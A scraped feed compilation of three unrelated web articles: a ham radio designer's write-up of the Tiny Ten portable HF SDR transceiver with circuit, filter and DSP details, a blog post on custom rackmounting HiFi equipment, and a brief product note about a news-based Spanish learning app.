    And the architecture. I am a big fan of using double analog conversion with a "wide-band" crystal filter at the first I-F. This allows big steps, like 5 kHz, on the 1st LO which can be essentially birdie free. It provides a lot of protection from interfering signals, as the crystal filter can be early in the gain progression. And finally this gives great flexibility for clean transmitter signal generation. Examples of this approach are the DSP-10 2-meter transceiver and VU2ESE's sBitx HF transceiver (search on either). But, the Tiny Ten does not follow that path; it uses the currently popular path of single conversion to DSP frequencies. This is simpler to build and, for a lower-power portable radio, probably quite adequate in performance. It also gives me a chance to play with this architecture that I had not used before. I hope to say more about the testing and design of this radio, as time allows.


    Tiny Ten front panel
    The little 128x64 pixel screen changes depending on what is happening. This is the receive mode for SSB or CW. The top line is battery voltage, date and time. Line two is an error code (none now) followed by receive signal strength, first in dBm and then S-units. The big line is frequency to the Hertz. Line 4 has the mode, audio and rf gain settings. Next is the S-meter bar graph calibrated in dBm. The bottom line has the internal temperature and a couple of unused spots.

    The radio described by bullet items - This lets you see the general character of the project.

    • SSB, CW, AM, FM, FT8 (13 character text) modes
    • 10 Bands, 160 to 10-meters BUT, Plug-In Coils!
    • 1-inch 128 x 64 display, Cute and tough to read
    • 1 knob and 10 buttons
    • W9GR Controlled Envelope SSB - 3 to 4 dB increased average power
    • Built-in 7.4V 2.2AH battery
    • Battery draws 170 mA receive, 4A transmit
    • High accuracy TCXO frequency reference
    • Built-in microphone and speaker
    • Delay stereo with external 'phones or speakers
    • Regulated 14-Volt, 2 Amp DC-DC converter, used only on transmit
    • Gaussian shaped CW on transmit and receive
    • Careful control of digital noise by construction and filtering
    • 600 MHz Teensy 4.1 with ARM Cortex-M7 for both DSP and control
    • All DSP with OpenAudio_F32 floating point library
    • Battery backed real time clock.
    • Storage of settings with power off
    • No electrolytic or tantalum capacitors
    • Size 2-1/2 x 6 x 2-inches (100 x 240 x 80 mm), weight under 1 lb

    At this time (January 2025) the radio is on the air, but on 80 and 75-meters only. The peak output power is just over 15 Watts. Down below is a list of planned improvements, but for now, it probably needs some use more than anything. Getting a simple front panel working is one thing; getting the user interface to be easy to use is another. On this page, we will try to provide a snapshot of what the radio is, electrically, mechanically, and in software.

    Electrical Description - 22 Feb 2025. The Twin Peaks circuitry is the biggest addition.


    Here is the schematic for the back RF PCB. It includes the LO, the direct conversion I-Q mixer, the RF power amplifier and various switches. This schematic was used in KiCad to generate the images (Gerbers) needed for making the PCB.

    Click on the picture to open a readable size in a new browser tab. Close the tab or change tabs to return here.

    Not shown here is the circuitry for a GPS module to lock the transceiver frequency and provide time and grid squares. The pads are on the RF board, but it has not been populated nor tested.

    The hardware architecture is a single RF frequency converter with quadrature signals fed in and out of the DSP. Switches are used at both the RF and I-F level to go between receive and transmit. A single output of the Si5351A synthesizer is used to drive the converter and set the RF frequency. This is run through a 74ALVC74 high-speed divide-by-4 to establish precise quadrature conversion signals. This sets the radio's operating frequency. A single RD16HHF MOSFET is the transmit output amplifier. The antenna relay is a latching type to save current. RF filtering and matching networks are on three small PCBs; this is an experiment to achieve two objectives. First is to save the weight of multi-band filters, when only one or two bands are actually used. The second objective is to increase the efficiency of the amplifier by using a single-band optimized network rather than broad-band transformers. The two low-level networks are the size of a postage stamp and the output network is about twice that size.
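    One practical consequence of the divide-by-4 scheme is that the Si5351A must run at four times the operating frequency. A trivial check (using the roughly 208 MHz LO limit observed later in this article) shows where that runs out:

    # LO must be 4x the operating frequency because of the 74ALVC74 divider
    LO_LIMIT_MHZ = 208.0  # approximate observed Si5351A limit

    for f_op in (3.75, 14.2, 29.0, 54.0):  # operating frequency, MHz
        lo = 4.0 * f_op
        note = " (beyond the LO limit)" if lo > LO_LIMIT_MHZ else ""
        print(f"{f_op:5.2f} MHz operate -> {lo:6.1f} MHz LO{note}")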


    This schematic is the digital PCB. It includes the PJRC Teensy 4.1 processor, the SGTL5000 codec with stereo ADC and DAC, DC voltage conditioning and regulators, the switches, knob and display. This schematic was used in KiCad to generate the images (Gerbers) needed for making the PCB.

    Click on the picture to open a readable size in a new browser tab. Close the tab or change tabs to return here.

    The digital board centers around the Teensy 4.1 processor. This is a small board that breaks out the multitude of processor pins as well as providing basic bypassing of power leads and DC power distribution. This both controls the radio and provides floating-point DSP for all receive and transmit signal processing. On the board is an SGTL5000 codec for audio (I-F) input and output. The digital PCB also has an audio output amplifier that is needed when driving speakers.

    Capacitors were a subject of experimentation in this project. Electrolytic and tantalum capacitors have higher series inductance than multi-layer ceramic counterparts, in part because of their larger size. They also have higher series resistance. Finally, they generally have shorter lifetimes (in years) than ceramics. The capacity values available in ceramics have increased as their costs have come down. So this design was done with only ceramic capacitors, with the largest values being 100 microFarads. See this discussion of multi-layer ceramics for more information. In addition, placing multiple values of bypass capacitors in parallel results in undesired parallel resonances (see the referenced link just given and also section 2.8 of Experimental Methods in RF Design). Only identical values were paralleled in this design.

    Tuned Circuits - (New writeup as of 31 Jan 2025) For the receive path, the RF filtering consists of octave-sized band-pass filters. This covers 80 to 10 as 3.5 to 7.3 MHz, 7.3 to 15 MHz and 15 to 30 MHz. This arrangement works fine since the mixers have responses at the 3rd, 5th and other odd harmonics, but not at the even harmonics. The circuits come from previous projects, but instead of using a latching relay, these use a small plug-in card, seen below. The board is quite small, about 0.75-inch (19 mm) across. The header connector has 0.05-inch (1.27 mm) pin spacing.


    Tiny Ten Octave Filter

    The transmit path uses the same mixer and octave filters as the receiver. This is followed by a 21 dB broadband amplifier and then a plug-in matching network to couple the amplifier to the MOSFET output amplifier. Finally, there is a plug-in matching network to transform the 5 Ohm impedance from the MOSFET to 50 Ohms for the antenna. The 21 dB driver amplifier uses a BFU590 NPN transistor and was designed as a 50 Ohm in-and-out circuit. The plug-in interstage matching network was made quite general in topology, as seen next, but not all of the components, such as the capacitors shunting the inductors, are used.


    Tiny Ten Interstage Matching Filter

    Following the transmit path on through, there is the Toshiba RD16HHF MOSFET and a plug-in output network. That network uses two cascaded L-networks, intended to perform in the spirit of the wonderful Matthaei transformers (n=4). Since these are plug-in networks, they only cover a single amateur band, providing minimum loss. To allow for the best attenuation of harmonics, each inductor can be shunted with a capacitor, placing a notch in transmission at the 2nd and 3rd harmonics. In its general form, the output network is shown below. It is a bigger board to allow better current-carrying capacity for the connector. The pins are spaced 0.1 inches (2.54 mm) apart. There is space for T37-6 toroids, as well.


    Tiny Ten Output Matching Filter

    The design approach was to omit the capacitors shunting the inductors and turn the optimizers in ARRL Radio Designer loose on providing 22 dB of gain from the MOSFET amplifier. The Radio Designer script for 10-meters shows an example of this. During optimization, the components for the driver amplifier were fixed as the 21 dB block described above. When implemented on the plug-in boards for 80/75-m, the amplifier performed as expected with output power over 10 Watts. The problem was that the 2nd and 3rd harmonics were only around -20 dB. So it was time to use the notch circuits in the output matching board. Two methods were used for this. They were added to the Radio Designer script with the notch capacitors always constrained to be at the 2nd and 3rd harmonics. This gave fine results, but the approach required setting up the optimization. For existing designs, a simple alternate approach was found to work well.

    This method of adding notches at the n-th harmonic, to a design that does not have notch capacitors, involves reducing the inductor value by a factor [1-1/(n^2)] and adding a capacitor of value 1/[(w^2)*L] where w=2*pi*n*fo, fo is the transmit frequency and L is the reduced inductor value. This results in the parallel LC having the same reactance at fo as did the original inductor and a notch at frequency n*fo.
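    As a sanity check, the recipe reduces to a couple of lines of arithmetic (a sketch; the example inductor value is arbitrary, not one of the actual board values):

    import math

    # Replace inductor L0 (henries) with a parallel LC that keeps the same
    # reactance at fo (Hz) but notches the n-th harmonic.
    def notch_parallel_lc(L0, fo, n):
        L = L0 * (1.0 - 1.0 / n**2)   # reduced inductor
        w = 2.0 * math.pi * n * fo    # notch angular frequency
        C = 1.0 / (w**2 * L)          # parallel capacitor
        return L, C

    # Example: 1.2 uH in a 3.6 MHz (80 m) network, notch at the 2nd harmonic
    L, C = notch_parallel_lc(1.2e-6, 3.6e6, 2)
    print(f"L' = {L*1e6:.3f} uH, C = {C*1e12:.0f} pF")  # 0.900 uH, ~543 pF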

    As things will do, the revised output network with notch capacitors did not suppress harmonics as expected. After some measurements and simulation, it was found that sharing of the ground pins on the plug-in connector caused coupling around the network. This is the result of the 20 nH, or so, inductance of the pins. This was cured by slicing the ground plane on the back of the output network board to cause the current in C3 and C4 to flow only through J1-3 and J1-4, while the current in C7 and C8 flowed only through J1-6.

    Mechanical Arrangement - Most of the radio is built on two major PCBs, the digital and RF PCBs, plus a small DC-DC converter. There are also three small plug-in network boards. This is seen in the top photo shown next:

    Tiny Ten Top View.
    This is the view from the top with the cover removed. The digital PCB is behind the front panel so that the switches just protrude. The RF PCB is held back-to-back with the digital PCB. The interconnects are all done by small single and double connectors with 1.27 mm spaced pins. This results in having no wires between the boards to radiate or pick up noise. This produces many of the advantages of a 4-layer PCB, but using less expensive 2-layer boards. The heat-sink bar connects between the RF output transistor and the back panel. It can be seen that it also has two screw holes to connect the top cover as a major heat-sink device. There is room on the back left corner for the battery. The three plug-in network boards can be seen at the top of the RF board. These are analogs to plug-in coils of the past and are important in that they allow low-loss coupling of RF energy by being specific to a band or bands. The Teensy 4.1 processor is on the digital board near the center, where the USB connector can be seen. The 14-Volt DC-DC converter, used only on transmit, is at the back right.

    Unpopulates Tiny Ten Digital PCB
    This is the digital board, slightly out-of-date.

    Unpopulated Tiny Ten RF PCB
    And this is the RF board. The two boards are spaced apart, ground plane to ground plane, by two 0.25-inch (6 mm) square aluminum bars. It needs updates, as well.

    DSP Software - All DSP runs at a fixed 48 kHz sample rate. This supports input frequencies up to about 22 kHz. The receive path uses double conversion, principally to increase the flexibility in the selection of the Si5351A frequencies to reduce birdies. This makes for a first I-F of about 15 kHz. The BFO is then in DSP and essentially birdie-free for any required frequency. Phasing-method conversions are used at both stages. The transmit path is classic I-Q direct conversion. Using the 15 kHz I-F for transmit can have problems with imperfect carrier suppression leading to opposite side-band re-growth in the following amplifiers. The problem still exists with direct conversion, but it is spectrally hidden by the closeness to the desired side-band. This means that there are more unwanted Si5351A birdies, but they are less of an issue in transmit than in receive.

    There are various generators, filters and detectors for supporting AM, FM, FT-8, as well as one and two-tone transmitter testing. These functions all come from the floating point DSP library. The following flow diagram is produced by the Design Tool (separate from the 16-bit design tool).


    Tiny Ten DSP Block Diagram
    This is the flow diagram created by the Design Tool referenced above. It represents the flow of audio signals in the Tiny Ten radio. What is less obvious is that within the DSP software, the lines between blocks will create "connecting" objects that work with the audio streaming system to ensure that the audio data are transferred as needed. This all happens automatically once the blocks and connections are instantiated. It makes it simple system to design and program the audio/I-F processing. Note that this diagram is not up-to-date in that there is a block, not shown, for the AudioAlign_F32 library class that corrects a problem in the SGTL5000 ADC that randomly mis-aligns the I and Q channels by one sample. This sits between the audioInI2S1 and NoiseBlank1.

    The software is in a single .INO file, plus separate files for some pre-defined FIR filters. It is not currently under any version control, but will end up on GitHub, eventually. Here is a copy of the .INO file, as of 21 February 2025. This is not being updated as changes are made, but it gives an idea of what the program looks like. Do not attempt to compile this file. I cannot help you at this point in the design process. This file compiled for me and ran the radio, but by the time you read this, I am working on a different un-controlled file. Including quite a bit of working notes, it comes to about 2500 lines, made a good bit smaller by use of the DSP library.

    Performance - As of this date, all of the functions are working, except the AM transmit and FT-8 transmit and receive. The AM transmit has the wrong carrier level and the FT-8 is installed in the DSP but has not been tested yet. Several CW and SSB contacts have been made with good reports. I ran the radio on Straight Key Night and made about 10 contacts. All this was on 80/75, as those are the only transmit output coils I have made. Using no pre-selection, I listened on all bands up to 6-meters. Interestingly, the LO drops out at 208 MHz, stopping the radio before the end of 6-meters. I have no intention of trying to make things work at 6-meters, but operation at 10-meters is reliable. The sensitivity of the receiver drops off at the higher bands, apparently because the LO introduces noise (not phase noise). This needs further exploration. Power output at 3.8 MHz is limited by the RF power amplifier to 16 Watts. Ten Watts was the goal and, as of this writing (22 Feb 25), the coil boards have been built for 10-meters and 12 Watts of power output has been measured. This needs further measurement before saying that 10-meters is ready.

    The CESSB works well. Signals sound good on SSB. FM seems to work fine, but I didn't spend much time on it. Opposite side-band suppression on transmit is 43 dB (single 1 kHz tone). Carrier suppression is higher. This is without any amplitude/phase corrections. There are corrections available if needed for the higher bands.

    The TCXO calibration procedure has been worked out, starting with putting the radio in the freezer. The various checks at 80/75 meters have shown the frequency to be within 1 Hz. It may not always be that good! The real-time clock works fine, and I have so far worked with the ability of the Teensy/Arduino loader to set the clock. The 2032 battery backup has worked fine.

    North American AM Broadcast Band - This is a bonus band. I made up a modified octave filter to cover 530 to 1400 kHz, in part to see how well it works and in part to be able to listen to the AM band. In order to not have a station at 1590 kHz appear at 1590/3=530 kHz, the filter was designed to have a cutoff at almost 1400 kHz. This gives up the top 300 kHz of the band. A Dremel tool was used to convert the use of L1 from a HP to a LP filter, without using any notch with it. The other two transmission poles were built, as usual, from L2 and L3 and associated capacitors. These two had capacitors to add notches. The component values are shown along with the graph of transmission. In general, this design is limited by the 1812 chip inductor Qu. Always a compromise. As for performance, the sensitivity is very good, stations at three times the tuned frequency have not shown up, and the quality of the sound from the DSP envelope detector is very good. I like the synthesized stereo sound from the delay binaural effect.


    Attenuation vs Frequency BC Band Filter
    This is the measured transmission of the AM broadcast filter. All three inductors are 1812 RF types. All capacitors are 0805 NP0 ceramics. Component values are: L1=10uH, L2=6.8uH, L3=3.6uH, C3=1500p, C4=1500p, C7=4700p, C9=560p, C10=560p, C11=1600p, C12=1600p, C13=2700p, C15=1300p.
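
    As a rough cross-check on those values, the notch frequencies fall out of the standard series-trap resonance formula. A minimal sketch, with the caveat that the particular L-C pairings below are my guess rather than anything stated above:

    // Series-trap resonance: f = 1 / (2*pi*sqrt(L*C)). The formula is standard;
    // which capacitor pairs with which inductor here is an assumption.
    const notchHz = (henry: number, farad: number): number =>
      1 / (2 * Math.PI * Math.sqrt(henry * farad));

    console.log(notchHz(3.6e-6, 2.7e-9)); // guessed L3 with C13: about 1.61 MHz, just above the band
    console.log(notchHz(6.8e-6, 1.3e-9)); // guessed L2 with C15: about 1.69 MHz

    Both guessed pairings land just above the 1400 kHz cutoff, which is where a low-pass of this style would want its notches.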

    Performance, I-Q Balance - [Added 16 Feb 2025] I measured the phase and amplitude balance for reception by introducing an RF signal of -50 dBm at the antenna connector, coming from a Fluke 6060B synthesized signal generator. In software, a DSP phase detector from the Teensy F32 library, AudioAnalyzePhase_F32, was placed at the ADC inputs corresponding to the I and Q inputs. Peak detectors were already in place, so we had accurate measurements of the analog I and Q vector voltages. These voltages are important as they are combined through phase shift networks to produce I-F signals in the 15 kHz range. If I and Q are not equal in amplitude and separated by 90 degrees in phase, an image signal will be received when tuned 30 kHz below the desired one. See KK7B's detailed discussion and analysis of this in Section 9.2 of Experimental Methods in RF Design. Note that the measurements shown here are without any corrections. Two-term corrections could be applied to cancel the errors. The following graph shows the measured I-Q phase shift.


    Measured I to Q phase shift
    This phase shift difference between the ADC outputs for the I and Q signals was measured in DSP using the phase detector in the OpenAudio_ArduinoLibrary referenced above. The input RF signal was -50 dBm, resulting in phase noise of a few tenths of a degree. The values here are the average of 1024 independent data points. Below 15 MHz or so, the phase is very close to 90 degrees. The LO conversion signals are derived from a 4:1 digital divider that inherently produces the correct sampling pulses. Typically the phase is within 0.2 degrees, corresponding to about 50 dB of image rejection. Above 15 MHz, the phase starts to show the effects of parasitic capacitances and unmatched delay paths. Still, up to about 40 MHz, the phase error is 1 degree or less, corresponding to 40 dB of image rejection. There is an interesting peak in the I-Q phase difference at 25 MHz. I have not explored the source of that error.

    Throughout the frequency range, the amplitude match of I and Q was typically a ratio of 1.004, corresponding to image rejection of 48 dB. In constructing the RF board I had the luxury of many 1% resistors and matched these up as best I could. Even the four Tayloe pulse storage capacitors were matched. This all shows up in the tight amplitude control of I and Q. Regardless, if I-Q amplitude correction were applied in the DSP, the resistor matching would be unnecessary.

    I measured the image rejection at a few RF frequencies. The measured values are consistent with the values calculated by the KK7B formulas, referenced above. Here are a couple of measurements with 14 MHz representing the lower frequency numbers and 39 MHz corresponding to a frequency with higher phase errors.

    14 MHz  |I|/|Q|=1.0035,  dPhase=89.97 deg, Image=-48 dB (calculated -49 dB)
    39 MHz  |I|/|Q|=1.0091,  dPhase=91.17 deg, Image=-37 dB (calculated -34 dB)
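
    For anyone wanting to reproduce these numbers, here is a minimal sketch of the small-error arithmetic. This is my reconstruction, not necessarily KK7B's exact published expression, but it agrees with the calculated values above to within about 1 dB:

    // Small-error approximation for image rejection from measured I-Q imbalance.
    function imageRejectionDb(amplitudeRatio: number, dPhaseDeg: number): number {
      const epsilon = amplitudeRatio - 1;               // fractional amplitude error
      const delta = ((dPhaseDeg - 90) * Math.PI) / 180; // phase error in radians
      return 10 * Math.log10(epsilon * epsilon + delta * delta);
    }

    console.log(imageRejectionDb(1.0035, 89.97).toFixed(1)); // about -49.0 dB at 14 MHz
    console.log(imageRejectionDb(1.0091, 91.17).toFixed(1)); // about -33.0 dB at 39 MHz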
    
    In general, the plan for now is to proceed without using corrections, possibly adding them in later.

    Somehow I managed to get this far while forgetting to put in the Twin Peaks time shifter for the SGTL5000 Codec. This was needed and has been added to the hardware and INO using the AlignLR DSP library class. At startup, before the LO has been turned on to create a receiver, an I/O pin on the Teensy is used to generate a square wave at about one fourth of the sample rate. This is introduced to both inputs of the ADC. A correlation is made between the I and Q ADC inputs with delays of 0, 1, 2 and 3 sample periods. The positive correlation is found, corresponding to the two channels being aligned. Then this shift is always made to bring the two channels into alignment. This is only required at start-up, as it never shifts while in operation.
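
    To illustrate the start-up lag search described above (a sketch of the idea only, not the AlignLR library code), the correlation step amounts to:

    // Correlate I against Q at lags of 0..3 samples and return the lag with the
    // most positive correlation; that lag is the shift that aligns the channels.
    function findAlignment(i: number[], q: number[]): number {
      let bestLag = 0;
      let bestCorr = -Infinity;
      for (let lag = 0; lag <= 3; lag++) {
        let corr = 0;
        for (let n = 0; n + lag < i.length; n++) {
          corr += i[n + lag] * q[n]; // shift I by `lag` samples against Q
        }
        if (corr > bestCorr) {
          bestCorr = corr;
          bestLag = lag;
        }
      }
      return bestLag;
    }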

    Performance, Audio Filters

    CW Filter Response
    This is the response of the Gaussian-shaped FIR filter for CW. The 6 dB bandwidth is about 200 Hz, but the sound of the filter is not narrow. The slow roll-off with frequency is effective in preventing signals from being lost when they are tuned slightly out of the pass band. The impulse response has an envelope that is also Gaussian, which minimises ringing. The filter was implemented by the filterFIRGeneral class in the OpenAudio_ArduinoLibrary.
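
    To make the shape concrete, here is a minimal sketch of a Gaussian-envelope band-pass FIR in the same spirit. This is my illustration, not the filterFIRGeneral design; the 600 Hz centre pitch, tap count and time constant are assumptions chosen to give a roughly 200 Hz 6 dB bandwidth:

    // Gaussian-envelope taps modulated to the CW pitch. A Gaussian envelope in
    // time gives a Gaussian frequency response, which is what minimises ringing.
    function gaussianCwFir(numTaps: number, fs: number, fc: number, sigmaT: number): number[] {
      const mid = (numTaps - 1) / 2;
      const taps = Array.from({ length: numTaps }, (_, n) => {
        const t = (n - mid) / fs;
        return Math.exp(-(t * t) / (2 * sigmaT * sigmaT)) * Math.cos(2 * Math.PI * fc * t);
      });
      const peak = Math.max(...taps.map(Math.abs)); // crude peak normalisation;
      return taps.map((h) => h / peak);             // real designs normalise passband gain
    }

    const taps = gaussianCwFir(513, 48000, 600, 0.002); // roughly 190 Hz at the -6 dB points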

    Planned Enhancements -

    TBD! But this will include getting FT-8 working for sending and receiving 13-character messages on non-standard FT-8 frequencies, finishing the front panel, and testing on 10 and 20-meters. Probably a temperature overload sensor will be added to the RF transmit output. The front panel needs marking. Plus more.

    Thank you -

    There are a lot of people who have contributed over the years to I-Q conversion technology for receiving and transmitting. Thanks to all of those. Also, K7MDL, KK7B, W7ZOI, K3KHF, W7GLF, VU2ESE, DD4WH, N6QKP, W7CQ, KF5N, AC8GY & W8TEE along with others on the T41 transceiver project, Paul Stoffregen and his associates with the Teensy processors, and Chip Audette all shared invaluable information. I did not look inside the Elecraft KX2 until after this radio was on the air, but just having seen it and used KK7P's fine software had its influence. Special thanks to KJ7ERE and KJ7EFX for patience and inspiration! Bob, W7PUA

    Back to W7PUA Home Page

    Issued 15 January, 2025. Last Revised: 22 Feb 2025 - All Copyright © Robert Larkin 2025. Hardware license: In exchange for being able to use any ideas that may be in the Tiny Ten hardware, you must never take any steps to restrict their use.

    ]]>
    https://www.janbob.com/electron/TinyTen/TinyTen.htm hacker-news-small-sites-43230864 Sun, 02 Mar 2025 14:34:50 GMT
    <![CDATA[Rackmounting that which should not be rackmounted]]> thread link) | @todsacerdoti
    March 2, 2025 | https://calbryant.uk/blog/rackmounting-that-which-should-not-be-rackmounted/ | archive.org

    Final assembly

    A few years ago I developed a few clever ways of rackmounting non-rackmount equipment so it could look neat in my HiFi rack enclosure.1 The goal was to have a professional-looking setup that would support input from my TV, Spotify, AirPlay, DJ controller and other sources while being able to drive a subwoofer with room correction and an integrated crossover.

    As part of this I also developed some HiFiBerry accessory hardware and code to allow streaming, input selection, remote volume control and track identification.2

    The rack conversions, hardware and code weren’t used long (as I tend to change around my HiFi gear frequently) but I figured given the work I put in it’s likely useful to someone else wanting to rackmount their HiFi gear or mess with HiFiBerry hardware.

    I enjoy the idea of modular systems, especially when it comes to HiFi. The ability to swap out any part to upgrade incrementally is appealing, as well as the possibility of producing custom enclosures and panels to integrate everything together.

    What follows is a (somewhat disjointed) chronicle of my journey to build a professional-looking custom 2U rack unit to combine a DAC, input selector, streaming device and power routing for my HiFi system.

    If you’re interested in doing anything similar, you may benefit from reading about the problems and solutions I’ve encountered along the way.


    1. The problem of having a rackmount enclosure is once you have one, every piece of equipment seems like it should be rackmounted. ↩︎

    2. All open sourced! See the conclusion for the code :-) ↩︎

    First prototypes

    Before this upgrade I converted a DAC (with USB beside) and phono pre-amp. I had a 1U blank plate where I drilled holes to allow it to sit behind the face plate of short equipment. This worked really well – I installed a DAC and a phono pre-amp, complete with front USB connection. Of course, this only works for items with detachable face plates so it limited what I could buy.

    The plan was to create an input selector with a pre-built 1U enclosure. It would contain a relay board, microcontroller and motorised 4-channel volume control to allow automatic selection of source while remembering the volume.

    Unit in situ with abandoned balanced input selector

    I actually got quite far along with the selector project,3 but lost interest when I realised I could achieve the same thing, without spending more time, after finding a Cambridge Audio DACMagic.

    Relay test program running on abandoned input selector project

    The DACMagic had a volume control, input selector and balanced outputs. This was taller than 1U so I’d have to use a 2U panel if I wanted to do the same as above.

    DACMagic with standard internet reference object for scale

    The front panel of the new DAC was also much more complicated so the old interposing method wouldn’t have worked well; I needed to cut out a large hole surrounding the face plate this time – which meant hand-cutting it like last time was not viable.


    3. It even had a motorised volume control with custom position sensor and a small OLED display! ↩︎

    Modelling in CAD

    I chose to make the main panel out of 3mm aluminium, with 3D printed junction boxes and brackets. With OpenSCAD I used a hierarchical file layout to enable the parts to be easily separated and rendered for manufacturing while allowing an assembly view for sizing and easy layout.

    Chosen origin in OpenSCAD

    My approach was to use a co-ordinate system as above, where the origin is on the left of the plate, halfway up, at the bottom. This made most of the transformations easier and provided a half-height reference for alignment.

    Front of assembly in CAD

    I then designed several boxes to hold the various components; the boxes were attached either with brass heat-set inserts, or took advantage of the connector mounting holes.

    Back of assembly in CAD

    Given the hierarchical file layout, I could easily render the individual parts as well as the assembled whole. This allowed checking that everything would fit before manufacture; important as producing the metal face plate was expensive.

    Final plate in CAD

    Given OpenSCAD is able to output SVG, I also designed the panel graphics as part of the design to later UV print them at a local graphics shop.

    Top assembly in CAD

    I won’t explain how the code works here, but if you’re interested I’ve put all the code in this repository. The code is reasonably well commented and documented.

    The final parts that I sent to manufacturing are here, just in case you want to make exactly the same thing.4

    As described in my OpenSCAD article, I had issues with circles in the DXF. I discovered that by going to SVG first it was possible to get slightly better DXF files (the lines were connected), but still not proper circles. Here's the script to do that. I strongly suspect going via FreeCAD is a better option here. I will explain why proper circles were particularly important in this case in the next section.


    4. Unlikely, but you can view the parts and see how it all fits together without having to render the code. ↩︎

    Manufacturing

    Panel metal

    I discovered a local company that could CNC turret punch the face plate for me. This manufacturing method was news to me; I had never heard of the process before.

    Trumpf CNC turret punch machine, similar to the one that made my parts

    The workpiece is moved around, bolted to a gantry. There is a turret with a cassette of tools available. The CAM software optimises the selection and order of tools based on what’s to cut, picking (for instance) circular or curved punches for holes. The tools are pushed through the metal to shear out small chunks at a time.

    Because a specific tool is needed for each piece of geometry, it's not possible to do certain holes or curves. That meant I was asked to adjust the panel holes a bit to suit what the machine had – only by around 0.5 mm or so, so it did not matter.

    The CAM tool selection was a big problem for me, as the curves and holes produced by OpenSCAD were polygon approximations; the software at the workshop didn't know how to associate tools with these shapes. I ended up importing the OpenSCAD output into FreeCAD, which is able to infer the proper circles from the approximations.

    Since then, I've discovered OpenSCAD-DXF-Fixup, which claims to solve this problem. I haven't tried it but I would check that out if you're in the same situation.

    Due to the shearing process, there were quite a lot of apparent tooling marks and burrs. I started to file them off, but quickly discovered that sanding the plate with medium grit sandpaper was much more effective and neater.

    Panel painting

    To paint the panels, instead of using rattle cans like I usually do, I thought I’d try a local auto paint shop. They gave me a good deal and put on some “2P” 2-part paint. The finish was flawless.

    Panel graphics

    I used a local company to do UV printing on the panel. I’ve had a great experience with UV printing at work – the finish is ultra durable and you’re able to print white too.

    I converted the text and graphics from OpenSCAD to SVG, which the company accepted.

    I’ll admit I had go fever and didn’t put as much time as I should have into the graphics. I put simple text – it was sufficient but I could have made it look far better with some lines, logos etc.

    Switch boxes

    In addition to the brackets for the DAC and Pi/display, I made some boxes to house the mains on/off switches and the XLR/USB inputs.

    Speaker input/switch box

    The general construction method can be seen above – the front is attached via the socket bolts, the back via brass inserts as described earlier. This worked really well to make the unit much more robust and hide the mess.

    The red device there is a 4 pole 2 position switch. It allows me to switch the inputs of the DSP unit from the DAC to my DJ controller which connects to the XLR inputs.

    HifiBerry and modifications

    I tried two HiFiBerry HATs, and settled on one with optical in and out. The optical out went to the DAC, and the input came from the TV. That way, in theory, I could get auto selection of TV vs Spotify and AirPlay.

    Pi/OLED/Dial bracket showing HiFiBerry optical interface

    I connected the display and encoder with some dupont jump leads, intending to replace it with a custom ribbon cable at a later date. In the end I decided it was good enough as is.

    HiFiBerry has some provision for a rotary encoder built in. However, the code used was polling-based, which resulted in a terrible experience using the dial – it would skip a lot and was slow. It also missed presses sometimes.

    To fix the rotary encoder issue I wrote some threaded Python volume-controller code. I never got around to upstreaming this, so if you end up using it please do so on my behalf.

    OLED test with starfield animation

    To test the OLED display I tried some animations built into the luma OLED library I used. I never got round to implementing the track information display, just an indication of the current volume, which was useful at least.

    Screen test animation to verify wiring and performance. OLED tech is so great!

    I have to say though, I was disappointed with the HiFiBerry. In concept it's great. However, I ran into a lot of reliability issues when using it with AirPlay or as a Spotify speaker; these things should just work, else they're frustrating and worse than simply using a cable.5

    The volume control was also apparently linear instead of logarithmic like it should be. This meant that the volume control was too sensitive at low volumes and not sensitive enough at high volumes.


    5. An analogy: Home automation. Don't replace a hard wired lightswitch which works 100% of the time with something "smart" that has dozens of single points of failure. More tech doesn't mean it's intrinsically better, it's just bad engineering. ↩︎

    Putting it all together

    Thankfully everything fit together first time; albeit the large DAC bracket was tight. I think this could have been due to shrinkage, but more likely due to poor tolerances of my old 3D printer.

    Front of fully assembled unit

    Given there was nothing but the brackets to stop the 3mm aluminium from flexing, the assembly wasn’t as solid as I’d hoped for. Solid enough, though.

    I used blu-tack to prevent the DAC from moving out. Given it was positively retained from moving in by the face plate, this was fine. A good idea as it was easily removable.

    Installed with the spectrum analyser

    My eventual solution

    In the end I abandoned the HiFiBerry, DACMagic (and Driverack DSP) in favour of a Wiim Pro which is more reliable, and has a 12V trigger output which I wired straight to a beefy relay to turn on the power amps. This works great and is far more reliable.

    The new DSP resulted in undeniably better sound quality and the Wiim Pro, while not perfect, is far more reliable.

    I kept the spectrum analyser though, as it’s rather interesting to associate bass notes with particular frequencies.

    Conclusion

    I have released the code to everything you see above in a github repository. It is supplied as-is without much documentation.

    It’s possible to rackmount nearly anything if you can sink it into a face panel somehow. It’s a great thing to do but high effort (and cost) the way I did it – a problem if you tend to change your gear around a lot like me.

    OpenSCAD is suited rather well to lay out the components, holes, support hardware and graphics all in one view. It is unfortunately not suited at all to a CNC turret punch simply because curves (arcs) are not properly represented in the DXF output – the machine therefore fails to find the right punch tool!

    Given my previous article I think I’d be better off 3D printing a rack conversion next time. The challenge would be to make it look just as solid and professional as the metal one – perhaps I could hide the necessary joins into the design and make the panel thicker to compensate.

    Given I now have a 3D printer able to print multiple colours, I could use a 0.2mm nozzle to embed (possibly backlit) graphics into the print itself. Alternatively I could use my laser cutter to vaporise a coating of paint to reveal the plastic colour underneath; there are many videos, such as this one on YouTube, that show how to do this.


    Thanks for reading! If you have comments or like this article, post or upvote it on Hacker news, Twitter, Hackaday, Lobste.rs, Reddit and/or LinkedIn.

    Please email me with any corrections or feedback.



    ]]>
    https://calbryant.uk/blog/rackmounting-that-which-should-not-be-rackmounted/ hacker-news-small-sites-43230831 Sun, 02 Mar 2025 14:30:47 GMT
    <![CDATA[Learn Spanish from news (content adapts to your level)]]> thread link) | @dkaleta
    March 2, 2025 | https://my-topics.io/newsroom/turning-news-into-topics/ | archive.org

    At Topics, our mission is simple: we want intermediate language learners to dive into real content much earlier than they'd normally feel comfortable. We do this by adapting any given material to match their language level.

    Of all the possible resources out there (books, magazines, music, you name it), we’re focusing on stories and news right now.

    Why News?

    News is an awesome way to learn a language because it covers events and topics you already have some context for. Reading about familiar subjects makes it way easier to pick up new words and phrases—even when you’re encountering them in a different language.

    News in Topics v2

    We’ve given our news section a big upgrade in the newest version of Topics. Instead of browsing each news channel individually, you’ll now find a News Timeline right in the Topics tab. Just glance at the timeline and pick a story that piques your interest—simple as that!

    Our news channels run on top of public RSS feeds. That means we can pull in the latest stories and convert them into language lessons automatically.

